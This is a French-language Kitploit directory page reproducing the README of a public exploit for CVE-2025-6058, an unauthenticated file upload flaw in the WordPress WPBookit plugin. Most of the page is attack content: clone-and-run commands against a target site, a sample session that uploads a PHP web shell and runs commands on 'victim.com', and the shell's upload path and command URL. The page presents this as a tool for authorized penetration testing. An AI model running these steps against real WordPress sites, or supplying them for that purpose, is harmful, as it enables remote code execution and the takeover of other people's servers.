Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/0xgh057r3c0n/cve-2025-6058
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHub0xgh057r3c0n/cve-2025-6058

CVE-2025-6058

WordPress WPBookit ≤ 1.0.4 Exploit de téléchargement de fichier non authentifié

Voir le dépôt
12il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Logo WordPress

🚨 CVE-2025-6058 — WordPress WPBookit ≤ 1.0.4 Exploitation de téléchargement de fichier non authentifié

Exploit de téléchargement arbitraire de fichier non authentifié ciblant le plugin WPBookit pour WordPress (≤ 1.0.4)
L'exploit permet le téléchargement distant d'un shell et l'exécution complète de commandes.

Auteur : 0xgh057r3c0n


📌 À propos de la vulnérabilité

CVE-2025-6058 est une vulnérabilité critique affectant le plugin WPBookit sur le CMS WordPress. Un attaquant non authentifié peut abuser d'un point de terminaison AJAX vulnérable pour télécharger des fichiers PHP arbitraires, permettant une .

exécution de code à distance (RCE)
  • 🎯 Cible : WordPress CMS (plugin WPBookit vulnérable)
  • 📦 Plugin concerné : WPBookit ≤ 1.0.4
  • ⚠️ Niveau de risque : Critique (RCE non authentifié)

✨ Fonctionnalités

  • 🔍 Détection automatique de la version du plugin WordPress via README.txt
  • 📤 Téléchargement d'un shell PHP léger (ghost_shell.php)
  • 🖥️ Shell interactif (style Parrot)
  • 🌐 Non authentifié — Aucune connexion requise
  • 🎨 Sortie CLI colorisée

🚀 Guide d'utilisation

💻 Prérequis

root@kitploit:~
python3 --version
pip install requests

⚙️ Exécution de l'exploit

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2025-6058.git
cd CVE-2025-6058
python3 CVE-2025-6058.py -u https://target-wordpress-site.com

🛠️ Exemple de session shell

root@kitploit:~
python3 CVE-2025-6058.py -u https://victim.com

[>] Vérification de la version du plugin...
[+] Version du plugin trouvée : 1.0.4
[!] La version cible est vulnérable.

[>] Téléchargement du shell...
[+] Téléchargement réussi.
[+] URL du shell : https://victim.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami

[!] GhostShell interactif démarré — tapez 'exit' pour quitter.

┌─[gaurav@0xgh057r3c0n]─[/var/www/html]
└──╼ $ whoami
www-data

📂 Détails du shell

  • Nom du fichier : ghost_shell.php
  • Chemin : /wp-content/uploads/YYYY/MM/ghost_shell.php
  • Exemple :
root@kitploit:~
https://target-wordpress-site.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami

⚠️ Avertissement légal

Cet exploit est développé à des fins éducatives et pour des tests de pénétration autorisés uniquement. Toute utilisation non autorisée contre des systèmes sans consentement explicite est illégale.


📄 Licence

Publié sous licence MIT


Conçu pour l'audit de sécurité WordPress 🛡️ par 0xgh057r3c0n

Télécharger l’outil